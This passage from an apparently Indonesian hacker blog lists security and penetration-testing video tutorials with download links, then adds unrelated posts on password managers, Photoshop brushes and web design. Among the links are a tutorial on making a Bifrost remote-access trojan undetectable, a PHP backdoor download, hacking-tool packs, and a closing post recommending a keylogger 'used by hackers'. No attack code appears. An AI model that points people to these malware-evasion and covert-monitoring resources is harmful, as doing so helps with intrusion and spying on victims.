http://rapidshare.com/files/11158798/79_mysql_bftools.rar

20. PHP Remote File (9mb)
PHP Remote File Inclusion Windows Backdoor.

Code:
http://rapidshare.com/files/11158805/80_PHP_Remote.rar

21. Cracking WEP in 10 Minutes (30mb)
A short demo of a wireless WEP attack. This is an interesting technique, where packets are injected to the access point, making it release weak IVs. You'll think twice about WEP after this

Code:
http://rapidshare.com/files/11158904/75_see-sec-wepcrack.zip

22. Tunneling Exploits via SSH (18mb)
An intensive demo showing how SSH Tunneling techniques can be used to exploit an interal, non routable network.

Code:
http://rapidshare.com/files/11158855/74_see-sec-ssh-dcom-tunneling.zip

23. A classic client side attack (18mb)
The MS06-001 vulnerability was used to execute a reverse connect shellcode. More information about this vulnerability can be found at the Microsoft site - MS06-001.

Code:
http://rapidshare.com/files/11158860/76_see-sec-client-side.rar

24. C++ Video tutorials (29mb)
Nice C/C++ Shockwave videos.

Code:
http://rapidshare.com/files/11158892/70_C__.rar

25. Interview with Kevin Mitnick (12mb)
He was on fbi's most wanted list, a nitrous Hacker but now see Kevin's Interview after being freed what he has to say about his past and future.

Code:
http://rapidshare.com/files/11158829/68_kevin.rar

26. Unix Shell Fundamentals (40mb)
VTC Unix Shell Fundamentals Video Tutorials. You need Quicktime player to view the videos.

Code:
http://rapidshare.com/files/11158906/69_UnixShellFund.rar

27. Microsoft.com Bugs
Nice videos shows of old bug that was exploited on the site.

Code:
http://rapidshare.com/files/11164765/67_MICROSOFT.rar

28. Bitfrost Server Crypting (15mb)
This is nice video for any one learning how to add bytes to make there server undetectable. The rar Password is Crypt.

Code:
http://rapidshare.com/files/11164849/66_Bifrost_Server_Cryp.rar

29. WMF File Code Execution Vulnerability With Metasploit (38mb)
This video covers the use of the recent (Jan 2006) WMF file code execution vulnerability with Metasploit. It shows how to shovel a shell back to the attacker with the WMF vulnerability. See Microsoft Security Advisory 912840. Thanks to kn1ghtl0rd, AcidTonic, Electroman and livinded for their help.

Code:
http://rapidshare.com/files/11164775/50_metasploitwmf.swf

30. SSH Dynamic Port Forwarding (30mb)
I set up a quick video tutorial to show how to set up an encrypted tunnel using SSH's dynamic port forwarding (sort of a poor man's VPN) in both Linux and Windows. The tools used are OpenSSH, PuTTY and Firefox, but it should be enough info to allow you to figure out how to set up other clients.

Code:
http://rapidshare.com/files/11164778/51_sshdynamicportforwarding.swf

31. Using VMware Player to run Live CDs (Bootable ISOs) (46mb)
In this video I show how to use the free VMware Player to run Live CDs like Knoppix, Auditor or Bart's PE Builder from an ISO

Code:
http://rapidshare.com/files/11164810/52_vmwareplayerlivecd.swf

32. Adding Modules to a Slax or Backtrack Live CD from Windows (43mb)

Code:
http://rapidshare.com/files/11164807/53_myslax.swf

33. Make your own VMs with hard drive for free: VMware Player + VMX Builder (16mb)

Code:
http://rapidshare.com/files/11164773/54_vmxbuilder.swf

34. Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text.info (44mb)

Code:
http://rapidshare.com/files/11164795/55_backtrackplaintext.swf

35. Droop's Box: Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools (67mb)

Code:
http://rapidshare.com/files/11164818/44_droops1.swf

36. WiGLE, JiGLE and Google Earth: Mapping out your wardrive (72mb)

Code:
http://rapidshare.com/files/11164827/45_wigle1.swf

37. Finding Rogue SMB File Shares On Your Network (60mb)

Code:
http://rapidshare.com/files/11164821/46_roguefileshares.swf

38. Nmap Video Tutorial 2: Port Scan Boogaloo (13mb)
This video covers some intermediate and advanced Nmap options and is a follow-up to "Basic Nmap Usage" presentation.

Code:
http://rapidshare.com/files/11164843/47_nmap2.swf

38. Metasploit Flash Tutorial
This video covers the use of Metasploit, launched from the Auditor Boot CD, to compromise an unpatched Windows XP box by using the RPC DCOM (MS03-026) vulnerability. It then sends back a VNC session to the attacker. This is just one example of the many things Metasploit can do.

Code:
http://rapidshare.com/files/11164788/48_metasploit1.swf

39. Using VirtualDub and a cheap webcam as a camcorder (10mb)
I thought this might be of use to those that would like to submit something to Infonomicon TV or Hack TV but lack the cash for a proper MiniDV camcorder.

Code:
http://rapidshare.com/files/11164832/49_cheapcamcorder.avi

40. Cracking Syskey and the SAM on Windows Using Samdump2 and John (25mb)

Code:
http://rapidshare.com/files/11164783/37_samdump2auditor.swf





lanjutan:



Film Hackers - 2 Takedown, banyak yang nanya soal ini kan ?
http://www.warungpl us.com/2007/ 11/20/hackers_ _2_takedown. html


Hackers 3 - Antitrust
http://www.warungpl us.com/2007/ 11/20/hackers_ 3__antitrust. html


Step By Step Pembuatan Antena Kaleng
http://www.warungpl us.com/2007/ 11/05/step_ by_step_pembuata n_antena_ kaleng.html


CBT Nuggets - Nugget Archive Server-MEGA PACK [REUPLOAD], didalamnya ada
tutorial CEH-nya lo... Warning...20 GB
http://www.warungpl us.com/2007/ 11/02/cbt_ nuggets__ nugget_archive_ servermega_ pack.html


Hacking Penetration Testing and Countermeasures Training
http://www.warungpl us.com/2007/ 11/01/hacking_ penetration_ testing_and_ countermeasures_ training. html


Certified Ethical Hacker Exam Preparation FULL PACKAGE
http://www.warungpl us.com/2007/ 10/21/certified_ ethical_hacker_ exam_preparation _full_package. html


Knowledgenet Cisco Academy - All In One, Complete KnowledgeNet Cisco Campus
Collection, Cisco eTraining Courseware
http://www.warungpl us.com/2007/ 10/18/knowledgen et_cisco_ academy__ all_in_one_ complete_ knowledgenet_ cisco_campus_ collection_ cisco_etraining_ courseware. html


Academy Certified Ethical Hacker CBT
http://www.warungpl us.com/2007/ 10/18/academy_ certified_ ethical_hacker_ cbt.html


Ultra H@ckers, tools hacking
http://www.warungpl us.com/2007/ 11/18/ultra_ hckers.html


101 Hacker Programs 2007
http://www.warungpl us.com/2007/ 11/08/101_ hacker_programs_ 2007.html


LinuxCBT Debian Edition
http://www.warungpl us.com/2007/ 08/23/linuxcbt_ debian_edition. html

portable password

08.12 by 1hacker's 0 komentar
Saking banyaknya akun yang anda miliki terkadang kerepotan dalam menghafalnya satu persatu, sehingga ada hal-hal praktis yang mungkin biasa dilakukan, seperti menyimpan informasi account yang penting ini ke dalam suatu catatan kecil dalam notepad. Hal ini sungguh mengerikan karena sangat beresiko. Dan banyak juga user yang memiliki berbagai macam akun mulai dari email, dan lain sebagainya namun memiliki password yang sama untuk semua akun, hal ini sama mengerikannya. Terkadang sekilas terpikir, adakah tools yang dapat memanage banyaknya akun tersebut kedalam satu database password namun memiliki tingkat sekuritas yang tinggi.
Jawabannya Ada, bahkan banyak sekali, Password manager, memungkinkan anda untuk memanage password-password account anda yang begitu banyaknya, mulai dari account email, forum, cpanel, milis, social networking, bahkan cc sekalipun. Cukup hafalkan satu password ( password database password manager ) mewakili sekian banyak password akun anda. Password Manager yang cukup menarik perhatian penulis salah satunya nPassword – Portable Password Manager. Dengan tata letak yang user friendly membuat management password jauh menjadi lebih mudah dan mengasyikan. Fitur yang menarik lainnya adalah, anda dapat mengkonfigurasi shortcut-shortcut
sendiri untuk copy paste dari database password yang ada tanpa harus mengetikkan satu persatu username dan passwordnya, sebagai contohnya ketika anda akan melakukan login di gmail cukup ketik win + N untuk mengisi username anda di field username, dan win + V untuk mengisi passwordnya. nPassword ini merupakan aplikasi portable yang memiliki size yang kecil, hanya berukuran 428 Kb tapi mampu dalam memanage password dengan baik, dengan enkripsi AES 256 bit.
Anda dapat mengunduhnya di sini
nPassword Portable Password Manager
Portable Password Manager yang cukup menarik lainnya antara lain :
Yadabyte Passwords ( memiliki enkripsi EAS 256 bit )
http://www.pendriveapps.com/yadabyte-portable-password-manager/


Password Safe
http://www.pendriveapps.com/password-safe-password-manager/
KeePass Password Safe
http://www.pendriveapps.com/keepass-password-safe-password-manager/
roboform2go
http://www.pendriveapps.com/roboform2go-portable-password-manager/

2000 bush photoshop

07.52 by 1hacker's 0 komentar
Brush jadi salah satu senjata inti bagi para photoshoper, untuk beberapa pecandu brush desain tanpa brush seperti sayur tanpa garam. Seperti kavaleri tanpa swiss army knife, seperti daging tak bertulang, halah... Yang menyenangkan adalah ribuan brush gratis bisa langsung di download satu demi satu, bagi anda yang kesulitan mendownload satu-satu kami menyediakan 1,39 GB Brush siap download, berisi lebih dari 2000 brush dari berbagai kategori.  Seperti Blood Brushes, Lightning Brushes, Angel Wings Brushes, Devil Wings Brushes?, silahkan download langsung di sini ...
http://hotfile.com/dl/49371068/dec51a0/More_than_2000_Photoshop_Brushes_.part1.rar.html
http://hotfile.com/dl/49371081/fc0b86e/More_than_2000_Photoshop_Brushes_.part2.rar.html
http://hotfile.com/dl/49371220/3b6aecc/More_than_2000_Photoshop_Brushes_.part3.rar.html
http://hotfile.com/dl/49371433/ddfb457/More_than_2000_Photoshop_Brushes_.part4.rar.html
http://hotfile.com/dl/49371467/8f632bb/More_than_2000_Photoshop_Brushes_.part5.rar.html
http://hotfile.com/dl/49371616/5fda3c9/More_than_2000_Photoshop_Brushes_.part6.rar.html
http://hotfile.com/dl/49371645/589c62c/More_than_2000_Photoshop_Brushes_.part7.rar.html
Selamat Mendownload.

tutorial

07.50 by 1hacker's 0 komentar
Di bagian ini Sang Tutor membawakan video yang membahas bagaimana membuat basic layout menggunakan Dreamweaver. Bermula dari pembuatan layout, kemudian slicing di photoshop, lalu proses layout di dreamweaver. Video Yang berdurasi > 30 menit ini cocok bagi Anda yang pemula dalam web design.
Silahkan langsung mendownloadnya disini :
http://www.ilmuwebsite.com/freevideotutorial/free-video-tutorial-webdesign-basic-tablebased.rar
Selamat mempelajari free video tutorial web design part 1.
Terima Kasih.

Website ini kode warna html table-nya apa ya? backgroundnya ??? Apa yang anda lakukan jika menemui kasus seperti ini? Buka aplikasi dreamweaver lalu mencari warnanya dengan color map fitur bawaan dreamweaver? Yup, itu juga bisa, namun penulis memiliki bookmark site yang menyediakan fasilitas berisi color code html, disajikan dalam bentuk pallete editor, sehingga anda dapat dengan nyaman mencari kode warna html tanpa perlu menjalankan aplikasi seperti adobe dreamweaver ataupun yang lainnya.

HTML Color Code merupakan salah satu website penyedia color tools yang secara gratis da
pat anda gunakan, silahkan kunjungi untuk langsung mencobanya. Free.
http://html-color-codes.info/#Html_Color_Code_Chart
Dan jadikan bookmark site yang mungkin berguna untuk anda. :)

keylogger

07.47 by 1hacker's 0 komentar
keylogger adalah sebuah software yg digunakam untuk merekam aktivitas di kompi mis mengetik

nah software ini lah yg dimanfaat kan para hacker ini link nya gan. cekidot langsung ke t.k.p
www.refog.com
tapi ini masih trial gan... tar ane update.in ane cariin yg free gan tenang aja